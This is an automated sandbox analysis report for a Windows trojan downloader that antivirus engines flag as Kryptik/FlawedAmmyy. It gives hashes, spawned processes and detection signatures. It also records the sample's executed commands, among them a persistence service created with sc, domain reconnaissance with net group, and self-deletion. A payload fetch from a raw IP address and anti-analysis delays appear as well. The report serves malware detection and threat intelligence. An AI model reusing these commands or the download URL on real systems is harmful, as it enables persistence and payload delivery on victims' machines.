lt1.json

1.  
2. [*] MalFamily: ""
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "lt1"
7. [*] File Size: 159488
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "b07340bd812ac1d6bab85b1b49c4e935f100b17d59da632533c8ddd361529f10"
10. [*] MD5: "2fcfddd92568af831a6f8febb817c900"
11. [*] SHA1: "0e5f89ff146d7b1b6af5826a67fad93cdb3f7657"
12. [*] SHA512: "4b11d0ff41ab6a58aad3de510fab8172521345372724047911355babd2bbfa32dc4fc2adff138de852de5fa3ca3ecbfafeff99d790eb6d000b8b397f3a312b9e"
13. [*] CRC32: "853324A9"
14. [*] SSDEEP: "3072:1k7WT8wAl28+h9VbjXKvKmeykXWlZrT8JUPQImMJ2szDHqldYPaShV1C8/Wn:1kHhl28+VbjXKvKmeykiZT8AQImz7YSB"
15.  
16. [*] Process Execution: [
17. "lt1.exe",
18. "net.exe",
19. "net1.exe",
20. "net.exe",
21. "net1.exe",
22. "cmd.exe",
23. "net.exe",
24. "net1.exe",
25. "cmd.exe",
26. "sc.exe",
27. "cmd.exe",
28. "net.exe",
29. "net1.exe",
30. "cmd.exe",
31. "sc.exe",
32. "cmd.exe",
33. "sc.exe",
34. "cmd.exe",
35. "net.exe",
36. "net1.exe",
37. "cmd.exe",
38. "services.exe",
39. "wsus.exe",
40. "wsus.exe",
41. "svchost.exe",
42. "svchost.exe",
43. "msiexec.exe",
44. "GoogleUpdate.exe",
45. "svchost.exe",
46. "taskhost.exe"
47. ]
48.  
49. [*] Signatures Detected: [
50. {
51. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
52. "Details": [
53. {
54. "IP": "185.106.122.120:80"
55. },
56. {
57. "IP": "172.217.11.163:443"
58. }
59. ]
60. },
61. {
62. "Description": "Creates RWX memory",
63. "Details": []
64. },
65. {
66. "Description": "A process attempted to delay the analysis task.",
67. "Details": [
68. {
69. "Process": "wsus.exe tried to sleep 599 seconds, actually delayed analysis time by 0 seconds"
70. }
71. ]
72. },
73. {
74. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
75. "Details": [
76. {
77. "ioc": "http://crl.globalsign.net/root-r2.crl0"
78. }
79. ]
80. },
81. {
82. "Description": "Reads data out of its own binary image",
83. "Details": [
84. {
85. "self_read": "process: wsus.exe, pid: 1720, offset: 0x00000000, length: 0x00000400"
86. }
87. ]
88. },
89. {
90. "Description": "A process created a hidden window",
91. "Details": [
92. {
93. "Process": "lt1.exe -> cmd"
94. },
95. {
96. "Process": "lt1.exe -> cmd"
97. },
98. {
99. "Process": "lt1.exe -> cmd"
100. },
101. {
102. "Process": "lt1.exe -> cmd"
103. },
104. {
105. "Process": "lt1.exe -> cmd"
106. },
107. {
108. "Process": "lt1.exe -> cmd"
109. },
110. {
111. "Process": "lt1.exe -> C:\\Windows\\System32\\cmd.exe"
112. }
113. ]
114. },
115. {
116. "Description": "Drops a binary and executes it",
117. "Details": [
118. {
119. "binary": "C:\\ProgramData\\NuGets\\wsus.exe"
120. }
121. ]
122. },
123. {
124. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
125. "Details": [
126. {
127. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
128. },
129. {
130. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
131. },
132. {
133. "suspicious_request": "http://185.140.248.17/01.dat"
134. },
135. {
136. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
137. },
138. {
139. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
140. },
141. {
142. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
143. },
144. {
145. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
146. },
147. {
148. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
149. },
150. {
151. "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
152. },
153. {
154. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
155. },
156. {
157. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
158. },
159. {
160. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
161. },
162. {
163. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
164. },
165. {
166. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
167. },
168. {
169. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
170. },
171. {
172. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
173. },
174. {
175. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
176. },
177. {
178. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
179. },
180. {
181. "suspicious_request": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
182. },
183. {
184. "suspicious_request": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
185. },
186. {
187. "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
188. },
189. {
190. "suspicious_request": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
191. },
192. {
193. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
194. },
195. {
196. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
197. },
198. {
199. "suspicious_request": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
200. },
201. {
202. "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
203. }
204. ]
205. },
206. {
207. "Description": "Performs some HTTP requests",
208. "Details": [
209. {
210. "url": "http://185.140.248.17/01.dat"
211. },
212. {
213. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
214. },
215. {
216. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
217. },
218. {
219. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
220. },
221. {
222. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
223. },
224. {
225. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
226. },
227. {
228. "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
229. },
230. {
231. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
232. },
233. {
234. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
235. },
236. {
237. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
238. },
239. {
240. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
241. },
242. {
243. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
244. },
245. {
246. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
247. },
248. {
249. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
250. },
251. {
252. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
253. },
254. {
255. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
256. },
257. {
258. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
259. },
260. {
261. "url": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
262. },
263. {
264. "url": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
265. },
266. {
267. "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
268. },
269. {
270. "url": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
271. },
272. {
273. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
274. },
275. {
276. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
277. },
278. {
279. "url": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
280. },
281. {
282. "url": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
283. }
284. ]
285. },
286. {
287. "Description": "Deletes its original binary from disk",
288. "Details": []
289. },
290. {
291. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
292. "Details": [
293. {
294. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 11852309 times"
295. }
296. ]
297. },
298. {
299. "Description": "Installs itself for autorun at Windows startup",
300. "Details": [
301. {
302. "service name": "foundation"
303. },
304. {
305. "service path": "C:\\ProgramData\\NuGets\\wsus.exe -service"
306. }
307. ]
308. },
309. {
310. "Description": "File has been identified by 19 Antiviruses on VirusTotal as malicious",
311. "Details": [
312. {
313. "FireEye": "Generic.mg.2fcfddd92568af83"
314. },
315. {
316. "Alibaba": "Trojan:Win32/Kryptik.24c3281f"
317. },
318. {
319. "Invincea": "heuristic"
320. },
321. {
322. "Symantec": "Trojan.Flawedammyy"
323. },
324. {
325. "Paloalto": "generic.ml"
326. },
327. {
328. "Kaspersky": "HEUR:Trojan.Win32.Generic"
329. },
330. {
331. "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
332. },
333. {
334. "McAfee-GW-Edition": "Artemis!Trojan"
335. },
336. {
337. "SentinelOne": "DFI - Suspicious PE"
338. },
339. {
340. "ESET-NOD32": "a variant of Win32/Kryptik.GTDL"
341. },
342. {
343. "Endgame": "malicious (high confidence)"
344. },
345. {
346. "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
347. },
348. {
349. "AhnLab-V3": "Downloader/Win32.FlawedAmmyy.C3289538"
350. },
351. {
352. "McAfee": "Artemis!2FCFDDD92568"
353. },
354. {
355. "VBA32": "BScope.Trojan.Zenpak"
356. },
357. {
358. "Cylance": "Unsafe"
359. },
360. {
361. "Ikarus": "Trojan.Win32.Crypt"
362. },
363. {
364. "AVG": "FileRepMalware"
365. },
366. {
367. "CrowdStrike": "win/malicious_confidence_90% (W)"
368. }
369. ]
370. }
371. ]
372.  
373. [*] Started Service: [
374. "foundation",
375. "msiserver",
376. "gupdate"
377. ]
378.  
379. [*] Executed Commands: [
380. "net group /domain",
381. "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe stop foundation",
382. "cmd /C net.exe stop foundation",
383. "\"C:\\Windows\\System32\\cmd.exe\" /C sc delete foundation",
384. "cmd /C sc delete foundation",
385. "\"C:\\Windows\\System32\\cmd.exe\" /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
386. "cmd /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
387. "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe start foundation y",
388. "cmd /C net.exe start foundation y",
389. "C:\\Windows\\System32\\cmd.exe /c del C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe >> NUL",
390. "C:\\Windows\\system32\\net1 group /domain",
391. "net.exe stop foundation",
392. "sc delete foundation",
393. "C:\\Windows\\system32\\net1 stop foundation",
394. "sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
395. "net.exe start foundation y",
396. "C:\\Windows\\system32\\net1 start foundation y",
397. "C:\\ProgramData\\NuGets\\wsus.exe -service",
398. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
399. "C:\\Windows\\system32\\msiexec.exe /V",
400. "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc",
401. "C:\\Windows\\System32\\svchost.exe -k netsvcs",
402. "\"C:\\ProgramData\\NuGets\\wsus.exe\" -nogui"
403. ]
404.  
405. [*] Mutexes: [
406. "Local\\ZoneAttributeCacheCounterMutex",
407. "Local\\ZonesCacheCounterMutex",
408. "Local\\ZonesLockedCacheCounterMutex",
409. "DBWinMutex",
410. "Broiduti#3483488**#",
411. "Global\\_MSIExecute",
412. "Global\\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}",
413. "Global\\G{6885AE8E-C070-458d-9711-37B9BEAB65F6}",
414. "Global\\G{66CC0160-ABB3-4066-AE47-1CA6AD5065C8}",
415. "Global\\G{0A175FBE-AEEC-4fea-855A-2AA549A88846}"
416. ]
417.  
418. [*] Modified Files: [
419. "\\Device\\NamedPipe",
420. "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
421. "C:\\ProgramData\\NuGets\\wsus.exe",
422. "\\??\\PIPE\\wkssvc",
423. "\\??\\PIPE\\lsarpc",
424. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
425. "\\??\\WMIDataDevice",
426. "\\??\\PIPE\\samr",
427. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
428. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
429. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
430. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
431. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
432. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
433. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
434. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
435. "\\??\\NUL",
436. "C:\\Windows\\Installer\\23b7c89.msi",
437. "C:\\Windows\\Installer\\23b7c8a.msi",
438. "\\??\\pipe\\GoogleCrashServices\\S-1-5-18",
439. "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat",
440. "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat"
441. ]
442.  
443. [*] Deleted Files: [
444. "C:\\ProgramData\\Microsoft Help\\wsus.exe",
445. "C:\\ProgramData\\NuGets\\wsus.exe",
446. "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
447. "C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe",
448. "C:\\Windows\\Installer\\23b7c89.msi",
449. "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}\\GoogleUpdateSetup.exe",
450. "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}"
451. ]
452.  
453. [*] Modified Registry Keys: [
454. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
455. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
456. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
457. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\msiserver\\Type",
458. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\gupdate\\Type",
459. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Start",
460. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Type",
461. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\netsxuid",
462. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
463. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
464. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
465. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
466. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
467. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
468. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
469. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
470. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
471. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
472. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
473. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}",
474. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingString",
475. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingTime",
476. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\pv",
477. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\pv",
478. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState",
479. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState\\StateValue",
480. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000_CLASSES\\Local Settings\\MuiCache\\2E\\52C64B7E\\LanguageList",
481. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\proxy\\source",
482. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\RollCallDayStartSec",
483. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\DayOfLastRollCall",
484. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\ping_freshness",
485. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\(Default)",
486. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\hint",
487. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\name",
488. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\LastCheckSuccess",
489. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
490. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ActivePingDayStartSec",
491. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\RollCallDayStartSec",
492. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastActivity",
493. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastRollCall",
494. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ping_freshness",
495. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\(Default)",
496. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\hint",
497. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\name",
